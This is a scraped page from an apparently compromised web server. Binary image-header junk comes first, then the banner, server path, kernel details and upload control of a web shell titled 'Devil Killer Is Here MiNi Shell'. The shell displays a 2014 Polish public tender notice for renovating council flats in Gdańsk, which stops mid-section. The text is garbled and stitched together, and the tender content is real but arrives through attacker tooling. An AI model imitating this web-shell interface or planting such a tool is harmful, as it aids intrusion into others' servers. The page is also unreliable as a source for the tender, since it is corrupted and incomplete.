JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140407/118034-N-2014.html

<p class="kh_header"><b>Gdańsk: wykonanie robót remontowych lokali mieszkalnych przy ulicach: Zdrojowej 1 m 1 i 2, Starowiślnej  6A m 3,  Rybitwy 7 m 2A, Suchej 2 m 1,  Władysława IV 20 m 2,  Miedzianej 6 m 1, Hożej 6b m 8, Ugory 5 m 11 i  3 m 1 w Gdańsku</b><br>
<b>Numer ogłoszenia: 118034 - 2014; data zamieszczenia: 07.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót remontowych lokali mieszkalnych przy ulicach: Zdrojowej 1 m 1 i 2, Starowiślnej  6A m 3,  Rybitwy 7 m 2A, Suchej 2 m 1,  Władysława IV 20 m 2,  Miedzianej 6 m 1, Hożej 6b m 8, Ugory 5 m 11 i  3 m 1 w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie robót remontowych lokali mieszkalnych przy ulicach: 
		Zdrojowej 1 m 1 i 2, Starowiślnej  6A m 3,  Rybitwy 7 m 2A, Suchej 2 m 1,  Władysława IV 20 m 2,  	Miedzianej 6 m 1, Hożej 6b m 8, Ugory 5 m 11 i  3 m 1 w Gdańsku. <br>
2.	Zakres robót obejmuje między innymi:<br>

a)  roboty ogólnobudowlane tj.<br>

- roboty rozbiórkowe,<br>

- wykonanie ścianek działowych,<br>

­- wykonanie okładzin z płyt kartonowo - gipsowych,<br>

­- wykonanie gładzi gipsowych,<br>

- roboty tynkarskie,<br>

- roboty malarskie,<br>

- wymiana stolarki okiennej wraz z wymianą parapetów,<br>

- wymiana stolarki drzwiowej,<br>

- wykonanie posadzek wraz z pracami odgrzybieniowymi,<br>

-wykonanie izolacji przeciwwilgociowej,<br>

-remont pieców kaflowych,<br>
 
­- naprawa stropów,<br>

-przebudowa instalacji wentylacyjnej,<br>

b)  roboty sanitarne tj.<br>

- wykonanie/remont instalacji wodociągowej i kanalizacyjnej wraz z montażem urządzeń,<br>

­- remont instalacji centralnego ogrzewania,<br>

-montaż/przebudowa instalacji gazowej,<br>

c)  roboty elektryczne tj.<br>

- wymiana/remont instalacji elektrycznej,<br>

- montaż czujników tlenku węgla w lokalach mieszkalnych wyposażonych w piece kaflowe, kotły grzewcze, trzony kuchenne i inne urządzenia grzewcze na paliwo stałe i gazowe z otwartym źródłem ognia.<br>

Szczegółowy zakres robót dla każdego lokalu mieszkalnego określony jest w przedmiarach dla poszczególnych lokali.<br>

Uwaga<br>
 
Minimalne parametry techniczne stolarki okiennej z drewna i PCV określone są w punkcie 2.4 i 2.4.1.Szczegółowej specyfikacji technicznej wykonania i odbioru robót. Stolarka drzwiowa i okienna - załącznik nr 1.7 do siwz.<br>

Stolarka drzwiowa winna spełniać minimalne warunki określone w obowiązujących polskich przepisach.<br>


3.	Szczegółowy opis przedmiotu zamówienia stanowią:<br>

1)	Ogólna specyfikacja techniczna wykonania i odbioru robót budowlanych. Wymagania ogólne - załącznik nr 1 do siwz.<br>
 
2)	Szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych. Roboty rozbiórkowe - załącznik nr 1.1do siwz.<br>
 
3)	Szczegółowa specyfikacja techniczna wykonania i odbioru robót. Tynki i okładziny wewnętrzne - załącznik nr 1.2 do siwz.<br>
 
4)	Szczegółowa specyfikacja techniczna wykonania i odbioru robót. Ścianki działowe z płyt G-K - załącznik nr 1.3 do siwz.<br>
 
5)	Szczegółowa specyfikacja techniczna wykonania i odbioru robót. Izolacje przeciwwilgociowe - załącznik nr 1.4 do siwz.<br>

6)	Szczegółowa specyfikacja techniczna wykonania i odbioru robót. Podłoża i posadzki, okładziny podłogowe - załącznik nr 1.5 do siwz.<br>
                                                                                                                                                                                                                                                                                                    
7)	Szczegółowa specyfikacja techniczna wykonania i odbioru robót. Powłoki malarskie - załącznik nr 1.6 do siwz.<br>

8)	Szczegółowa specyfikacja techniczna wykonania i odbioru robót. Stolarka drzwiowa i okienna - załącznik nr 1.7 do siwz.<br>
     
9)	Specyfikacja techniczna wykonania i odbioru robót budowlanych. Roboty instalacyjne gazowe - załącznik nr 2 do siwz.<br>

10)	Szczegółowe specyfikacje techniczne. Instalacja wodociągowa. Instalacja kanalizacyjna. - załącznik nr 3 do siwz.<br>

11)	Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych. Roboty w zakresie instalacji elektrycznych wewnętrznych. Roboty w zakresie przewodów instalacji elektrycznych. 	Roboty w zakresie montażu opraw, osprzętu, urządzeń i odbiorników energii elektrycznej - załącznik nr 4 do siwz.<br>

12)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 1 przy ul. Zdrojowej  1 - załącznik nr 5 do siwz.<br>

13)	Rysunek - szkic lokalu mieszkalnego nr 1 w budynku przy ul. Zdrojowej 1 w Gdańsku -	załącznik nr 5.1 do siwz.<br>

14)	Przedmiar - Remont lokalu mieszkalnego Gdańsk ul. Zdrojowa 1 m 1 - branża ogólnobudowlana -załącznik nr 5.2 do siwz.<br>
 
15)	Przedmiar - Remont instalacji sanitarnych w mieszkaniu ul. Zdrojowa 1 m 1 - branża sanitarna - załącznik nr 5.3 do siwz.<br>

16)	Przedmiar - Wymiana instalacji elektrycznej  w lokalu nr 1 Gdańsk ul. Zdrojowa 1  - branża 	elektryczna - załącznik nr 5.4 do siwz.<br>

17)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 2 przy ul. Zdrojowej 1 - załącznik nr 6 do siwz.<br>

18)	Rysunek - szkic lokalu mieszkalnego nr 2 w budynku przy ul. Zdrojowej 1 w Gdańsku -	załącznik nr 6.1 do siwz.<br>

19)	Przedmiar - Remont mieszkania Gdańsk ul. Zdrojowa 1 m 2 - branża ogólnobudowlana - załącznik nr 6.2 do siwz.<br>

20)	Przedmiar - Remont instalacji sanitarnych w mieszkaniu ul. Zdrojowa 1 m 2 - branża sanitarna - załącznik nr 6.3 do siwz.<br>

21)	Przedmiar - Wymiana instalacji elektrycznej  w lokalu nr 2 Gdańsk ul. Zdrojowa 1 - branża elektryczna - załącznik nr 6.4 do siwz.<br>

22)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 3 przy ul. Starowiślna 6A - załącznik nr 7 do siwz.<br>

23)	Rysunek - szkic lokalu mieszkalnego  przy ul. Starowiślna 6A m 3 w Gdańsku -- załącznik nr 7.1 do siwz<br>

24)	Przedmiar - Remont lokalu ul. Starowiślna 6A m 3- branża ogólnobudowlana - załącznik nr 7.2 do siwz.<br>

25)	Przedmiar - Remont instalacji wod-kan.  ul. Starowiślna 6A m 3 - branża budowlana, sanitarna - załącznik nr 7.3 do siwz.<br>

26)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 3 Gdańsk ul. Starowiślna 6A - branża elektryczna - załącznik nr 7.4 do siwz.<br>

27)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 2A przy ul. Rybitwy 7 - załącznik nr 8 do siwz. <br>

28)	Rysunek - szkic  lokal mieszkalny nr 2A przy ul. Rybitwy 7 - załącznik nr 8.1 do siwz.<br>

29)	Przedmiar - Remont lokalu ul. Rybitwy 7 m 2A- branża ogólnobudowlana - załącznik nr 8.2 do siwz. <br>
30)	Przedmiar - Remont instalacji wod-kan.  ul. Rybitwy 7 m 2A - branża budowlana, sanitarna -załącznik nr 8.3 do siwz.<br>
31)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 2A Gdańsk ul. Rybitwy 7 - branża elektryczna - załącznik nr 8.4 do siwz. <br>
32)	Rysunek  - szkic lokalu nr 1 przy ul. Suchej 2  - załącznik nr 9  do siwz <br>                                                                                                                                                                                                    
33)	Przedmiar - Remont lokalu ul. Sucha 2/1  - branża ogólnobudowlana - załącznik nr 9.1.do siwz <br>
34)	Przedmiar - Remont instalacji wod-kan.  ul. Sucha 2 m 1- branża budowlana, sanitarna - załącznik nr 9.2.do siwz <br>
35)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 1 Gdańsk ul. Sucha 2 - branża elektryczna - załącznik nr 9.3.do siwz <br>
36)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 2 przy ul. Władysława IV 20 - załącznik nr 10 do siwz.<br>
37)	Rysunek - szkic lokalu nr 2 przy ul. Władysława IV 20 - załącznik nr 10.1. do siwz <br>                                        
38)	Przedmiar - Remont lokalu ul. Władysława IV 20/2 - branża ogólnobudowlana - załącznik nr 10.2 do siwz.<br>
39)	Przedmiar - Remont instalacji wod-kan ul. Władysława IV 20/2 - branża budowlana, sanitarna - załącznik nr 10.3 do siwz.<br>
40)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 2 Gdańsk ul. Władysława IV 20 - branża elektryczna - załącznik nr 10.4 do siwz. <br>
41)	Przedmiar - Remont lokalu mieszkalnego Gdańsk ul. Miedziana 6 m 1 - branża ogólnobudowlana -załącznik nr 11.1 do siwz.<br>
42)	Przedmiar - Remont lokalu mieszkalnego Gdańsk ul. Miedziana 6 m 1 - branża sanitarna - załącznik nr 11.2 do siwz.<br>  
43)	Przedmiar - Remont lokalu mieszkalnego Gdańsk ul. Miedziana 6 m 1 - Roboty w zakresie okablowania oraz instalacji elektrycznych - załącznik nr 11.3 do siwz.<br>  
44) 	Arkusz inwentaryzacyjny - lokal mieszkalny nr 8 przy ul. Hożej 6B - załącznik nr 12 do siwz.<br>  
45)	Rysunek - rzut lokalu mieszkalnego nr 8 przy ul. Hożej 6B - załącznik nr 12.1 do siwz. <br>                                                         
46)	Przedmiar - Remont lokalu. ul. Hożej 6B m 8 - branża ogólnobudowlana - załącznik nr 12.2 do siwz.<br>  
47)	Przedmiar - Remont instalacji wod-kan. i gazowej ul. Hoża 6B m 8 - branża sanitarna - załącznik nr 12.3 do siwz.<br>  
48)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 8, Gdańsk ul. Hoża 6B - branża elektryczna - załącznik nr 12.4 do siwz.<br>  
49)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 11 przy ul. Ugory 5 - załącznik nr 13 do siwz.<br>  
50)	Rysunek  - rzut lokalu mieszkalnego nr 11 przy ul. Ugory 5 - załącznik nr 13.1 do siwz.<br>                                                                                                                                                                                                         
51)	Przedmiar - Remont lokalu ul. Ugory 5 m 11 - branża ogólnobudowlana - załącznik nr 13.2 do siwz.<br>  
52)	Przedmiar - Remont instalacji wod-kan.  ul. Ugory 5 m 11 - branża budowlana, sanitarna - załącznik nr 13.3 do siwz.<br>  
53)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 11 Gdańsk ul. Ugory 5 - branża elektryczna -załącznik nr 13.4 do siwz.<br>  
54)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 1 przy ul. Ugory 3 - załącznik nr 14 do siwz.<br>  
55)	Rysunek  - rzut lokalu mieszkalnego nr 1 przy ul. Ugory 3 - załącznik nr 14.1 do siwz. <br>                                                                                                                                                                                                        
56)	Przedmiar - Remont lokalu ul. Ugory 3 m 1 - branża ogólnobudowlana - załącznik nr 14.2 do siwz.<br>  
57)	Przedmiar - Remont instalacji wod-kan.  ul. Ugory 3 m 1 - branża budowlana, sanitarna - załącznik nr 14.3 do siwz.<br>  
58)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 1 Gdańsk ul. Ugory 3 - branża elektryczna -załącznik nr 14.4 do siwz.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.11.11.00-9, 45.11.12.20-6, 45.21.00.00-2, 45.26.23.21-7, 45.31.00.00-3, 45.33.22.00-5, 45.33.23.00-6, 45.33.30.00-0, 45.40.00.00-1, 45.41.00.00-4, 45.42.11.31-1, 45.42.11.31-8, 45.42.11.46-9, 45.42.11.52-4, 45.43.00.00-0, 45.43.11.00-8, 45.43.12.00-9, 45.44.21.00-8, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> OFERTA MUSI BYĆ ZABEZPIECZONA WADIUM W WYSOKOŚCI  8 500,00 ZŁ W TYM :<br>
Zadanie 1 - 3 500,00 zł,<br>
Zadanie 2 - 1 000,00 zł,<br>
Zadanie 3-  4 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich pięciu lat przed upływem terminu składania ofert:<br>
w przypadku składania ofert:<br>
- na zadanie 1 - minimum 2 roboty budowlane polegające na wykonaniu robót adaptacyjnych (remontowych) lokali lub budynków o wartości nie mniejszej niż 
20 000,00 zł  brutto każda, obejmujące roboty ogólnobudowlane, sanitarne i elektryczne.<br>
- na zadanie 2 i /lub zadanie 3 - minimum 2 roboty budowlane polegające na wykonaniu robót adaptacyjnych (remontowych) lokali lub budynków o wartości nie mniejszej niż 40 000,00 zł brutto każda, obejmujące roboty ogólnobudowlane, sanitarne i elektryczne.<br>
- na zadanie 1 i zadanie 2 i /lub zadanie 3 - minimum 2 roboty budowlane polegające na wykonaniu robót adaptacyjnych (remontowych) lokali lub budynków o wartości nie mniejszej niż 40 000,00 zł brutto każda, obejmujące roboty ogólnobudowlane, sanitarne i elektryczne.<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunki mogą spełniać łącznie.<br>

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował  zasobami niezbędnymi do realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać dysponowanie 5 osobami, w tym: <br>
- 1 osobą, posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, <br>
- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, <br>
- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, <br>
- 1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku dozoru w zakresie konserwacji, remontów, kontrolno-pomiarowym urządzeń, instalacji i sieci należących do Grupy 3. Urządzenia, instalacje i sieci gazowe wytwarzające, przetwarzające, przesyłające, magazynujące i zużywające paliwa gazowe dla urządzeń i instalacji gazowych o ciśnieniu nie wyższym niż 5 kPa, zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U. nr  89 poz. 828 z późn. zm.),<br>
- 1 osobą posiadającą uprawnienia do wykonywania pracy na stanowisku eksploatacji w zakresie montażu, remontu, kontrolno-pomiarowym urządzeń i instalacji należących do Grupy 1.   Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające,  przetwarzające, przesyłające i zużywające energię elektryczną dla urządzeń i instalacji o napięciu nie wyższym niż 1 kV, zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy  i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania  kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci. (Dz.U. nr  89 poz. 828 z późn.zm.).<br>
Wyżej wymienione uprawnienia powinny upoważniać do wykonywania pomiarów ochronnych instalacji do 1 kV.<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej Wykonawca musi wykazać dysponowanie ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej:<br>
-   w przypadku składania oferty na zadanie 1 -   200 000,00 zł;<br>
-   w przypadku składania oferty na zadanie 2 -     60 000,00 zł;<br>
-   w przypadku składania oferty na zadanie 3 -   230 000,00 zł;<br>

 w przypadku składania oferty na zadanie 1 i/lub zadanie 2 i /lub zadanie 3 do oferty musi być załączona polisa lub inny dokument ubezpieczenia w wysokości sumy ubezpieczenia poszczególnych zadań.<br>
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca.<br>

Wykonawca może polegać na zdolnościach ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Przez najważniejsze roboty Zamawiający rozumie roboty budowlane polegające na wykonaniu robót adaptacyjnych (remontowych) lokali lub budynków
w przypadku składania ofert :<br>
- na zadanie 1 - o wartości nie mniejszej niż 20 000,00 zł  brutto każda, obejmujące roboty 	ogólnobudowlane, sanitarne i elektryczne.<br>
- na zadanie 2 i /lub zadanie 3  - o wartości nie mniejszej niż 40 000,00 zł brutto każda, obejmujące 	roboty ogólnobudowlane, sanitarne i elektryczne.<br>
- na zadanie 1 i zadanie 2 i /lub zadanie 3 - o wartości nie  mniejszej niż 40 000,00 zł brutto każda, 	obejmujące roboty ogólnobudowlane, sanitarne i elektryczne.<br>

Zamawiający nie żąda informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>a)	pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia,<br> 
b)	dokument o odpowiedzialności solidarnej wykonawcy i podmiotu, na którego zasoby ekonomiczne powołuje się wykonawca.<br>  
Wyżej wymienione zobowiązanie oraz dokument o odpowiedzialności solidarnej muszą być złożone w formie oryginału.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
